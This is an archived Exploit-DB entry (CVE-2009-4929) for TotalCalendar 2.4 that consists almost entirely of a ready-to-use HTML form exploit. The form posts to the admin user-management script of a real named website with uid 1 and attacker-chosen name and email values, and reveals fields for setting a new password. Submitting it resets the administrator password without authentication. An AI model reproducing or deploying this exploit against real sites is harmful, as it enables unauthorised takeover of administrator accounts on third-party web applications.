TotalCalendar 2.4 - Remote Password Change Exploit

2009-04-20T00:00:00
ID EDB-ID:8496
Type exploitdb
Reporter ThE g0bL!N
Modified 2009-04-20T00:00:00

Description

TotalCalendar 2.4 Remote Password Change Exploit. CVE-2009-4929. Webapps exploit for php platform

                                        
                                             <title> Powered by: TotalCalendar 2.4 Remote Password Change </title> 
<tr align="left">
<td width="10"> </td>
<td align="center"><span class="boxHeader">Cod[3]d By ThE g0bL!N</span></td>
<td width="10" align="right"></td>
</tr>
</table></span></td>
   
    </tr>
  </table>
  </td>
   </tr>
   <tr>
     <td style="padding: 0px;">
  <table width="100%" height="100%" cellspacing="0" style="padding: 0px;">
    <tr>
  
   <td height="100%" style="padding: 0px;">
 <div align="left" id="25_content_area" style="">
  <script language="javascript">
  // Should we show the pw changing fields or not
  function pwChanger(bool)
  {
   if(bool)
   {
    // Show password changer
    document.getElementById('pwChange').style.display = "none";
    document.getElementById('pwDontChange').style.display = "";
    document.getElementById('pwChangerArea').style.display = "";
    document.getElementById('changePW').value = 1;
   }
   else
   {
    // Hide password changer
    document.getElementById('pwChange').style.display = "";
    document.getElementById('pwDontChange').style.display = "none";
    document.getElementById('pwChangerArea').style.display = "none";
    document.getElementById('changePW').value = 0;
   }
  }
  </script>
  <br /<br /><br /><form method="POST" action="http://www.swingknoxville.org/calendar/admin/manage_users.php"><input type="hidden" name="action" value="Save" /><input id="changePW" type="hidden" name="changePW" value="0" /><input type="hidden" name="uid" value="1" />
  <table align="center">
    <tr>
      <td align="right" valign="top"><b>First Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="fname" value="Dos-Dz" size="33" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Last Name:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="lname" value="admin" size="33" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Username:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="username" value="admin" size="25" /></td>
    </tr>
    <tr>
      <td align="right" valign="top"><b>Email Address:</b></td>
   <td>  </td>
   <td align="left" valign="top"><input name="email" value="x0q@hotmail.fr" size="40" /></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChange">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(true);" title="Click here to reset user's passord..." style="cursor: pointer;">Reset Password</a></td>
    </tr>
    <tr id="pwDontChange" style="display: none;">
      <td align="right" valign="top"> </td>
   <td>  </td>
   <td align="left" valign="top"><a class="smallLinkText" onClick="pwChanger(false);" title="Don't reset user's password password..." style="cursor: pointer;">Do Not Reset Password</a></td>
    </tr>
    <tr>
      <td colspan="3"> </td>
    </tr>
    <tr id="pwChangerArea" style="display: none;">
      <td colspan="3">
   <table width="100%">
     <tr>
    <td align="right" valign="top"><b>New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW1" size="20" /></td>
     </tr>
     <tr>
    <td align="right" valign="top"><b>Confirm New Password:</b></td>
    <td>  </td>
    <td align="left" valign="top"><input type="password" name="newPW2" size="20" /></td>
     </tr>
     <tr>
    <td colspan="3"> </td>
     </tr>
   </table>
      </td>
    </tr>
    <tr>
      <td colspan="3" align="center"><input type="submit" name="action" value="Save" /> <input type="submit" name="action" value="Cancel" /></td>
    </tr>
  </table></form><br /></div></td>

# milw0rm.com [2009-04-20]